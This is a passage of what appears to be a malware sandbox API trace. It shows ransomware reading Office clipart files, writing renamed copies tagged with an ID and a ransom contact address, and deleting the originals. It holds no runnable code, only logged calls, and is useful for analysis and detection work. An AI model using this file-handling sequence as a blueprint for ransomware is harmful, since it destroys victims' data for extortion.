returned 4 [0061.659] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.659] lstrlenW (lpString=".rar") returned 4 [0061.659] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.659] lstrlenW (lpString=".bz2") returned 4 [0061.659] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.659] lstrlenW (lpString=".7z") returned 3 [0061.659] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.659] lstrlenW (lpString=".dbf") returned 4 [0061.659] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.659] lstrlenW (lpString=".1cd") returned 4 [0061.659] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.659] lstrlenW (lpString=".jpg") returned 4 [0061.659] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.663] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.663] lstrlenW (lpString="AG00175_.GIF") returned 12 [0061.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.664] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=3378) returned 1 [0061.664] CloseHandle (hObject=0x350) returned 1 [0061.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif")) returned 0x220 [0061.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.664] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.664] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.665] GetLastError () returned 0x0 [0061.665] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xd32, lpOverlapped=0x0) returned 1 [0061.840] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xd40, lpOverlapped=0x0) returned 1 [0061.841] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.841] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.841] SetEndOfFile (hFile=0x344) returned 1 [0061.841] CloseHandle (hObject=0x344) returned 1 [0061.842] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.842] SetEndOfFile (hFile=0x350) returned 1 [0061.843] CloseHandle (hObject=0x350) returned 1 [0061.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.843] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif")) returned 1 [0061.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.845] lstrlenW (lpString=".doc") returned 4 [0061.845] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.845] lstrlenW (lpString=".docx") returned 5 [0061.845] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.845] lstrlenW (lpString=".pdf") returned 4 [0061.845] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.845] lstrlenW (lpString=".xls") returned 4 [0061.845] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.845] lstrlenW (lpString=".xlsx") returned 5 [0061.845] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.845] lstrlenW (lpString=".ppt") returned 4 [0061.845] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.845] lstrlenW (lpString=".zip") returned 4 [0061.845] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.845] lstrlenW (lpString=".rar") returned 4 [0061.845] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.845] lstrlenW (lpString=".bz2") returned 4 [0061.845] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.845] lstrlenW (lpString=".7z") returned 3 [0061.845] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.845] lstrlenW (lpString=".dbf") returned 4 [0061.845] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.845] lstrlenW (lpString=".1cd") returned 4 [0061.845] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.845] lstrlenW (lpString=".jpg") returned 4 [0061.845] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.846] lstrlenW (lpString=".doc") returned 4 [0061.846] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.846] lstrlenW (lpString=".docx") returned 5 [0061.846] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.846] lstrlenW (lpString=".pdf") returned 4 [0061.846] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.846] lstrlenW (lpString=".xls") returned 4 [0061.846] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.846] lstrlenW (lpString=".xlsx") returned 5 [0061.846] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.846] lstrlenW (lpString=".ppt") returned 4 [0061.846] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.846] lstrlenW (lpString=".zip") returned 4 [0061.846] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.846] lstrlenW (lpString=".rar") returned 4 [0061.846] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.846] lstrlenW (lpString=".bz2") returned 4 [0061.846] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.846] lstrlenW (lpString=".7z") returned 3 [0061.846] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.846] lstrlenW (lpString=".dbf") returned 4 [0061.846] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.846] lstrlenW (lpString=".1cd") returned 4 [0061.846] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0061.846] lstrlenW (lpString=".jpg") returned 4 [0061.846] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.846] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0061.846] lstrlenW (lpString="AN00853_.WMF") returned 12 [0061.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.859] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=20578) returned 1 [0061.859] CloseHandle (hObject=0x344) returned 1 [0061.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf")) returned 0x220 [0061.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.860] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.860] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.861] GetLastError () returned 0x0 [0061.862] ReadFile (in: hFile=0x344, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x5062, lpOverlapped=0x0) returned 1 [0061.962] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x5070, lpOverlapped=0x0) returned 1 [0061.963] ReadFile (in: hFile=0x344, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.963] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.963] SetEndOfFile (hFile=0x340) returned 1 [0061.963] CloseHandle (hObject=0x340) returned 1 [0061.964] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.964] SetEndOfFile (hFile=0x344) returned 1 [0061.965] CloseHandle (hObject=0x344) returned 1 [0061.965] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.965] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf")) returned 1 [0061.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.965] lstrlenW (lpString=".doc") returned 4 [0061.966] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.966] lstrlenW (lpString=".docx") returned 5 [0061.966] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.966] lstrlenW (lpString=".pdf") returned 4 [0061.966] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.966] lstrlenW (lpString=".xls") returned 4 [0061.966] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.966] lstrlenW (lpString=".xlsx") returned 5 [0061.966] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.966] lstrlenW (lpString=".ppt") returned 4 [0061.966] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.966] lstrlenW (lpString=".zip") returned 4 [0061.966] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.966] lstrlenW (lpString=".rar") returned 4 [0061.966] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.966] lstrlenW (lpString=".bz2") returned 4 [0061.966] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.966] lstrlenW (lpString=".7z") returned 3 [0061.966] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.966] lstrlenW (lpString=".dbf") returned 4 [0061.966] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.966] lstrlenW (lpString=".1cd") returned 4 [0061.966] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.966] lstrlenW (lpString=".jpg") returned 4 [0061.966] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.966] lstrlenW (lpString=".doc") returned 4 [0061.966] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.966] lstrlenW (lpString=".docx") returned 5 [0061.966] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.967] lstrlenW (lpString=".pdf") returned 4 [0061.967] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.967] lstrlenW (lpString=".xls") returned 4 [0061.967] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.967] lstrlenW (lpString=".xlsx") returned 5 [0061.967] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.967] lstrlenW (lpString=".ppt") returned 4 [0061.967] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.967] lstrlenW (lpString=".zip") returned 4 [0061.967] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.967] lstrlenW (lpString=".rar") returned 4 [0061.967] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.967] lstrlenW (lpString=".bz2") returned 4 [0061.967] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.967] lstrlenW (lpString=".7z") returned 3 [0061.967] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.967] lstrlenW (lpString=".dbf") returned 4 [0061.967] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.967] lstrlenW (lpString=".1cd") returned 4 [0061.967] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0061.967] lstrlenW (lpString=".jpg") returned 4 [0061.967] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.967] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0061.967] lstrlenW (lpString="AN00965_.WMF") returned 12 [0061.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.968] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=7072) returned 1 [0061.968] CloseHandle (hObject=0x344) returned 1 [0061.968] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf")) returned 0x220 [0061.968] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.968] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.968] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.968] GetLastError () returned 0x0 [0061.968] ReadFile (in: hFile=0x344, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1ba0, lpOverlapped=0x0) returned 1 [0061.982] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1bb0, lpOverlapped=0x0) returned 1 [0061.983] ReadFile (in: hFile=0x344, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.983] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.983] SetEndOfFile (hFile=0x340) returned 1 [0061.984] CloseHandle (hObject=0x340) returned 1 [0061.984] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.984] SetEndOfFile (hFile=0x344) returned 1 [0061.985] CloseHandle (hObject=0x344) returned 1 [0061.985] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.985] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf")) returned 1 [0061.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.986] lstrlenW (lpString=".doc") returned 4 [0061.986] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.986] lstrlenW (lpString=".docx") returned 5 [0061.986] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.986] lstrlenW (lpString=".pdf") returned 4 [0061.986] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.986] lstrlenW (lpString=".xls") returned 4 [0061.986] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.986] lstrlenW (lpString=".xlsx") returned 5 [0061.986] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.986] lstrlenW (lpString=".ppt") returned 4 [0061.986] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.986] lstrlenW (lpString=".zip") returned 4 [0061.986] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.986] lstrlenW (lpString=".rar") returned 4 [0061.986] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.986] lstrlenW (lpString=".bz2") returned 4 [0061.986] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.986] lstrlenW (lpString=".7z") returned 3 [0061.986] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.986] lstrlenW (lpString=".dbf") returned 4 [0061.986] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.986] lstrlenW (lpString=".1cd") returned 4 [0061.986] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.986] lstrlenW (lpString=".jpg") returned 4 [0061.986] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.986] lstrlenW (lpString=".doc") returned 4 [0061.986] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.987] lstrlenW (lpString=".docx") returned 5 [0061.987] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.987] lstrlenW (lpString=".pdf") returned 4 [0061.987] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.987] lstrlenW (lpString=".xls") returned 4 [0061.987] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.987] lstrlenW (lpString=".xlsx") returned 5 [0061.987] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.987] lstrlenW (lpString=".ppt") returned 4 [0061.987] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.987] lstrlenW (lpString=".zip") returned 4 [0061.987] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.987] lstrlenW (lpString=".rar") returned 4 [0061.987] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.987] lstrlenW (lpString=".bz2") returned 4 [0061.987] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.987] lstrlenW (lpString=".7z") returned 3 [0061.987] lstrcmpiW 